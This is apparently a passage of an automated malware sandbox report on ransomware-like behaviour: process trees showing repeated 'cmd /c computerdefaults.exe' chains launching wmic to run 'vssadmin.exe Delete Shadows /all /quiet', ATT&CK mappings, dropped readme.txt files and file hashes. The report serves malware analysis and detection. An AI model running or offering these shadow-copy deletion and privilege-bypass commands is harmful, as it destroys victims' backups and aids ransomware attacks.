    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:6052

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:2656
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:5664
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:4572

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:844
- C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  2⤵
  PID:3732

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5004

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5152

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4212
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:5408
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:5512

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5156

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:6088

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:5412
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:5796
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:3600

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4952
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:2476
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:5400

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:5180
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:3416
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:5852

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5900

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:3480

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5232

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5216

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:3596

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5484

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:5424
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:5784
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:1544

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:3816
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:6012
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:1692

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:3376

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:220

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1268

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:3108
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:3480
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:4416

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:5484
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4992
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:6136

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5796

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:768

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1268

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:3128

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:6064
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:3736
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:6024

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:1600
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:2412
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:5152
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3480

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:1176
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:3964
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:5344
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5128

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4140
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:2448
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:5792

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5980
- C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  2⤵
  PID:5796

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5932

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:4912

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:3376

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
efc9c7501d0a6db520763baad1e05ce8

SHA1
60b5e190124b54ff7234bb2e36071d9c8db8545f

SHA256
7af7b56e2f0a84ae008785726f3404eb9001baa4b5531d0d618c6bdcb05a3a7a

SHA512
bda611ddba56513a30295ea5ca8bc59e552154f860d13fed97201cdb81814dd6d1bca7deca6f8f58c9ae585d91e450f4383a365f80560f4b8e59a4c8b53c327d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
111B

MD5
285252a2f6327d41eab203dc2f402c67

SHA1
acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6

SHA256
5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026

SHA512
11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
7757560f6907a155fa242d256ca52d81

SHA1
ccffded367c779d9f91d75a0d4364b8732926abf

SHA256
f8d8197134837264f5d8d80ff3762fa7357b0908db78d13d45db94e5689c2225

SHA512
82db546f6e2ec3b43ee30b18cb7bbeeb3775106f8e216531c407241e48d6dd0aaf39eb1c679934e7f8079371e9a1cea3c6a6a0f53519d380a52b7aa97283ce22

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
34402c5be536f370feb41119f2335311

SHA1
abce653349368303c10c2ef98afabf914c15b65d

SHA256
3ad50479afc1377819b88850fc45fdcfad3cbafe3be491d42036a862f29ed066

SHA512
65de5571051162f6ed37810e9c3aa2d0e7a0f9da1451542cdc388c00875616473af106ed11d5a8b5cb8ae10393d952b7ba0eea6d58051c32f26cf0922eff2599

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

Filesize
24KB

MD5
121510c1483c9de9fdb590c20526ec0a

SHA1
96443a812fe4d3c522cfdbc9c95155e11939f4e2

SHA256
cf5d26bc399d0200a32080741e12f77d784a3117e6d58e07106e913f257aa46c

SHA512
b367741da9ab4e9a621ad663762bd9c459676e0fb1412e60f7068834cbd5c83b050608e33d5320e1b191be1d809fef48831e0f42b3ecabd38b24ec222576fa81

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
c804152d8fcc9e886f1acc8ace56daef

SHA1
d3b8c01ccb7f382b4c628de49aab8f79710c1d03

SHA256
4d5c233d6ed462c395c35dc4e41aed0d5b70abf5749e3da8b98b4cd84d9387ea

SHA512
1606b0dd426f19942175b5fd1b704c12bbfe4b6d488f8645501bd926fb8bfdb4848e04a50f49b4898f6d10a974026fe9af017e5871b38b8ab9acfdc6e0815ff2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
3KB

MD5
0342b46cebae8f3acdaa3c7aadeb9496

SHA1
50a3b549ff809f530d4b12560b0229bd717f758d

SHA256
44bc9b7d71fbdeae1e9b4fd1b1b96e3cf01d707443d0beb4ddba5a378ec61116

SHA512
f83271c3ded1cdec26572a9245950e4077ace83faba55724d8ed7341363b23f7bfec8572720a8781fcb2cd71be24e9788134f05125d0ba0fc1a0dffb7ea523e4

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\310091\1704702482

Filesize
2KB

MD5
18f4f2ef8807c9cb5e0c8d5eacc58097

SHA1
9561970138a67edecb00c01cd8a4ed2b8e669065

SHA256
b9086f3cb8b9d4524f857144515e1e247b91b92f65c44598193d2597384565f9

SHA512
7474b3e0f2db90055ff05072d9532ef891cf895f13f907e4560aad41aafd76d2d79b0f78c71f1f2d430635ed1b512f40136a1857b75d39a3fb2f3595352f93af

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\338388\1704702482

Filesize
4KB

MD5
30deaebce729074c1bf71c22e4715470

SHA1
73f73511de748b2efc0b2b381eddb091694e6082

SHA256
beb62c7a11a746a6dc43b094ab2de6ea578e219a83cbbda4a8471e6b6aa419d7

SHA512
6005794f4bc58611d174c9125e947797fdac5c61545b023991128bedbe6b7bccf08e7a17ff6511e8732538ff615cb18b60b555f581aad7ab69ecf9ef9025b572

Download Submit
C:\Users\Admin\Pictures\readme.txt

Filesize
1KB

MD5
080a6be665f33a127088e40a92feaf90

SHA1
7e74939a7529295f7f2a9d73e1d271ad987443aa

SHA256
b9fa3d0b30f5f9a79ddbdbd7370e6531e6f665ae77fd89df46ec1a73036f9f7f

SHA512
60a9a1259651d9d74c1cc450b7a4181276fee865502e3b0ccd7689d08ffc2913b325f3686f5b8f8b412ce967185182d46e1d5ebdabb3025cada1a37a9d191e0d

Download Submit
C:\Users\Public\readme.txt

Filesize
332B

MD5
718777534403cdcf89b5d9b5f4b2f141

SHA1
3f49f57f3c25d60fef6d5593c9eb5a69b74a7b29

SHA256
619de8a85d1beac2e0b2c9cef08f56fc70859f6f4dd0f763d2175bdac746b0cb

SHA512
8018fdbec663355db212827869eb7744f615f58db96e9a12da248f40979d28d8057bcab945381e43cb346e0b3ded14743efd8b47727ca98e32e430b6519d7440

Download Submit
memory/2760-6-0x0000028B5BEF0000-0x0000028B5BEF5000-memory.dmp

Filesize
20KB

Download
memory/4612-7-0x0000025DB5BF0000-0x0000025DB5BF1000-memory.dmp

Filesize
4KB

Download
memory/4612-14-0x0000025DB6680000-0x0000025DB6681000-memory.dmp

Filesize
4KB

Download
memory/4612-12-0x0000025DB5C70000-0x0000025DB5C71000-memory.dmp

Filesize
4KB

Download
memory/4612-10-0x0000025DB5C40000-0x0000025DB5C41000-memory.dmp

Filesize
4KB

Download
memory/4612-11-0x0000025DB5C50000-0x0000025DB5C51000-memory.dmp

Filesize
4KB

Download
memory/4612-9-0x0000025DB5C00000-0x0000025DB5C01000-memory.dmp

Filesize
4KB

Download
memory/4612-5-0x0000025DB5BE0000-0x0000025DB5BE1000-memory.dmp

Filesize
4KB

Download
memory/4612-0-0x0000025DB5D10000-0x0000025DB6648000-memory.dmp

Filesize
9.2MB

Download
memory/4612-4-0x0000025DB5BD0000-0x0000025DB5BD1000-memory.dmp

Filesize
4KB

Download
memory/4612-3-0x0000025DB5BC0000-0x0000025DB5BC1000-memory.dmp

Filesize
4KB

Download
memory/4612-2-0x0000025DB5BB0000-0x0000025DB5BB1000-memory.dmp

Filesize
4KB

Download
memory/4612-1-0x0000025DB5BA0000-0x0000025DB5BA1000-memory.dmp

Filesize
4KB

Download